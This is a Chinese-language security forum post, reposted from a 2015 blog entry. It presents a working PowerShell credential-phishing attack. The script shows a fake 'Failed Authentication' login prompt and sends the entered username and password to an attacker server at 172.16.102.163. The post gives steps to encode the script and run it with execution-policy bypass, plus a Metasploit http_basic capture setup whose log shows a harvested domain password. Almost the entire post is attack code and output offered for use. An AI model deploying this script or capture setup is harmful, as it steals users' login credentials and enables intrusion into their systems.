- A+
所属分类:WooYun-Zone
五道口杀气 
| 2015-01-13 18:17
Powershell Popups + Capture (WOOYUN)
from:http://www.room362.com/blog/2015/01/12/powershell-popups-plus-capture/
这个方法优势就是可以不产生任何文件,可以获取任何权限用户的认证信息
不需要管理员权限,不需要绕过UAC。
原理就是利用powershell脚本制造一个假的登陆界面,管理员登陆之后会把密码发送到我们的服务器上。
这里接收密码是使用的metasploit。
powershell脚本:
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');
172.16.102.163为我们接受的地址。
cat power.txt | iconv --to-code UTF-16LE | base64
把代码生成base64.
然后执行
powershell -ep bypass -enc <base64编码的代码>
metasploit接收密码:
root@wpad:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options
Module options (auxiliary/server/capture/http_basic):
Name Current Setting Required Description
---- --------------- -------- -----------
REALM Secure Site yes The authentication realm you'd like to present.
RedirectURL no The page to redirect users to after they enter basic auth creds
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*] Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140 http_basic - Sending 401 to client 172.16.102.140
[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /
(十根阳具有长短!!) 
